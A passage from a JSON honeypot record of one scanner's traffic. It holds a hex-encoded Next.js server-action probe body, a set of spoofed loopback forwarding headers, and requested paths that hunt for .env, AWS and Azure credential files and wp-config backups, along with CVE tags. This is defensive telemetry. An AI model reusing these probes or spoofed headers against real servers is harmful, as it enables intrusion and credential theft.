a0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a7b7d0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a5b2224313a61613a6161225d0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361642d2d","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36","community_id":"1:AN/WyqrncqqW2KyK46KDmRmjolQ=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"7e6bce3b-b76c-4aeb-b97a-53aa3532529c","seq":1,"duration_ms":100,"bytes_in":1002,"bytes_out":78}],"http_methods":[{"method":"GET","count":3549},{"method":"POST","count":20}],"distinct_ports_total":5,"top_paths":[{"path":"/wp-json/gravitysmtp/v1/tests/mock-data?page=gravitysmtp-settings","count":4,"ports":1},{"path":"/debugbar","count":2,"ports":2},{"path":"/_profiler/phpinfo","count":2,"ports":2},{"path":"/:8081/%2eenv","count":2,"ports":1},{"path":"/register","count":2,"ports":2},{"path":"/api/auth","count":2,"ports":1},{"path":"/~/%2eaws/credentials","count":2,"ports":1},{"path":"/message-api/actuator/env","count":2,"ports":2},{"path":"/api/db/test%2eenv","count":1,"ports":1},{"path":"/admin/sql/config%2ejson","count":1,"ports":1},{"path":"/wp-config.php.old","count":1,"ports":1},{"path":"/api/php/wp-config%2ebak","count":1,"ports":1},{"path":"/azure-credentials%2eyml","count":1,"ports":1},{"path":"/static/admin/js/","count":1,"ports":1},{"path":"/adm/api/info.php","count":1,"ports":1}],"distinct_paths_total":200,"top_snis":[],"top_hosts":[],"top_alpns":[{"value":"h2, http/1.1","count":569}],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Accept-Language","Cf-Connecting-Ip","Content-Length","Content-Type","Host","Next-Action","Next-Router-State-Tree","True-Client-Ip","User-Agent","X-Azure-Clientip","X-Azure-Socketip","X-Client-Ip","X-Forwarded-For","X-Forwared","X-Host","X-Originating-Ip","X-Real-Ip"],"representative":[{"name":"Accept","value":"text/x-component","notable":false},{"name":"Accept-Encoding","value":"gzip","notable":false},{"name":"Accept-Language","value":"en-US,en;q=0.9","notable":false},{"name":"Cf-Connecting-Ip","value":"127.0.0.1","notable":false},{"name":"Content-Length","value":"232","notable":false},{"name":"Content-Type","value":"multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad","notable":true},{"name":"Host","value":"<HONEYPOT>:8452","notable":false},{"name":"Next-Action","value":"x","notable":false},{"name":"Next-Router-State-Tree","value":"%5B%22%22%2C%7B%7D%5D","notable":false},{"name":"True-Client-Ip","value":"127.0.0.1","notable":false},{"name":"User-Agent","value":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36","notable":false},{"name":"X-Azure-Clientip","value":"127.0.0.1","notable":true},{"name":"X-Azure-Socketip","value":"127.0.0.1","notable":true},{"name":"X-Client-Ip","value":"127.0.0.1","notable":true},{"name":"X-Forwarded-For","value":"127.0.0.1","notable":true},{"name":"X-Forwared","value":"127.0.0.1","notable":true},{"name":"X-Host","value":"127.0.0.1","notable":true},{"name":"X-Originating-Ip","value":"127.0.0.1","notable":true},{"name":"X-Real-Ip","value":"127.0.0.1","notable":true}],"distinct_sets":2,"events_with_headers":10},"tags":[{"tag_id":"CVE-2025-64328","tag_type":"cve","title":"FreePBX  >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/admin/config.php","reference_urls":["https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw","https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/","https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog"]},{"tag_id":"CVE-2024-4836","tag_type":"cve","title":"Edito CMS - Sensitive Data Leak","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/config.php","reference_urls":["https://cert.pl/en/posts/2024/07/CVE-2024-4836/","https://github.com/sleep46/CVE-2024-4836_Check","https://nvd.nist.gov/vuln/detail/CVE-2024-4836"]},{"tag_id":"CVE-2024-50340","tag_type":"cve","title":"Symfony Profiler - Remote Access via Injected Arguments","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/_profiler/phpinfo","reference_urls":["https://github.com/symfony/symfony/commit/a77b308c3f179ed7c8a8bc295f82b2d6ee3493fa","https://github.com/symfony/symfony/security/advisories/GHSA-x8vp-gf4q-mw5j","https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7","https://github.com/nollium/CVE-2024-50340-eos-exploit","https://nvd.nist.gov/vuln/detail/CVE-2024-50340"]},{"tag_id":"CVE-2026-3396","tag_type":"cve","title":"WCAPF WooCommerce Ajax Product Filter - SQL Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/shop","reference_urls":["https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability","https://nvd.nist.gov/vuln/detail/CVE-2026-3396"]},{"tag_id":"CVE-2026-4020","tag_type":"cve","title":"Gravity SMTP WordPress Plugin - Sensitive Information Exposure","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-json/gravitysmtp/v1/tests/mock-data","reference_urls":["https://patchstack.com/database/vulnerability/wordpress-gravity-smtp-plugin-2-1-4-unauthenticated-sensitive-information-exposure-via-rest-api-vulnerability","https://www.wordfence.com/threat-intel/vulnerabilities/id/12a296db-ecc0-409b-8718-0c208504053a?source=cve","https://nvd.nist.gov/vuln/detail/CVE-2026-4020"]},{"tag_id":"CVE-2018-13380","tag_type":"cve","title":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/message","reference_urls":["https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html","https://fortiguard.com/advisory/FG-IR-18-383","https://fortiguard.com/advisory/FG-IR-20-230","https://nvd.nist.gov/vuln/detail/CVE-2018-13380","https://github.com/merlinepedra25/nuclei-templates"]},{"tag_id":"CVE-2019-12461","tag_type":"cve","title":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/log","reference_urls":["https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS","https://webport.se/nedladdningar/","https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS/","https://emreovunc.com/blog/en/WebPort-Reflected-XSS-02.png","https://nvd.nist.gov/vuln/detail/CVE-2019-12461"]},{"tag_id":"CVE-2020-15895","tag_type":"cve","title":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/info.php","reference_urls":["https://research.loginsoft.com/bugs/multiple-vulnerabilities-discovered-in-the-d-link-firmware-dir-816l/","https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10169","https://nvd.nist.gov/vuln/detail/CVE-2020-15895","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2021-28169","tag_type":"cve","title":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/static","reference_urls":["https://twitter.com/sec715/status/1406787963569065988","https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq","https://lists.apache.org/thread.html/r2721aba31a8562639c4b937150897e24f78f747cdbda8641c0f659fe@%3Cusers.kafka.apache.org%3E","https://nvd.nist.gov/vuln/detail/CVE-2021-28169","https://lists.apache.org/thread.html/r04a4b4553a23aff26f42635a6ae388c3b162aab30a88d12e59d05168@%3Cjira.kafka.apache.org%3E"]},{"tag_id":"CVE-2021-37598","tag_type":"cve","title":"WP Cerber < 8.9.3 - Broken Access Control","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-json","reference_urls":["https://github.com/mandiant/Vulnerability-Disclosures/blob/master/FEYE-2021-0024/FEYE-2021-0024.md","https://nvd.nist.gov/vuln/detail/CVE-2021-37598"]}],"data_as_of":"2026-07-01T15:10:07.931827+00:00"}